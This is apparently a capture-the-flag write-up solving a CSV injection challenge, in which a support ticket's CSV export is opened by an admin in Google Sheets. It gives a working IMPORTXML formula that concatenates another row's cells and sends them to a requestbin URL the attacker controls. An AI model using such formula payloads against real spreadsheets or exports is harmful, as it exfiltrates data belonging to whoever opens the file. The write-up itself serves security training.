Solution: CSV Injection

Tools Used:
Navigate to the Support Ticket Site provided in the scope.

Fill in random values for the support ticket and click submit. Observe that it gives us a CSV download, which it notes is identical to the one the admin will download - except in this one, all other tickets (which includes the flag) are blanked out with Xs. It also notes that the admin will upload this CSV file to Google Drive, then open it in Google sheets.

So that outlines our testing plan - for each thing we desire to test, we will submit the form, which downloads a CSV file, then upload that CSV file to a Google Drive account, then open it in Google Sheets. That will let us test that our formulas work right.

First thing we need to do is discover what are our options for formulas. If you do an internet search for "Google Sheets function list", you'll find this page. If you read George Mauer's blog post which was mentioned in the challenge, you'll be guided towards the data import functions like IMPORTXML.

Poke around for a while and you'll discover a formula like this will work to extract all the contents on the second row in the spreadsheet.

=IMPORTXML(CONCAT("http://requestbin.net/r/11zce2g1?v=", CONCATENATE(A2:E2)), "//a")
Replace the requestbin URL with one you control (go generate a new one). You must keep the "?v=" at the end of the requestbin url to actually extract the values. Submit the formula as one of the values in your ticket, and then check your requestbin to see the flag.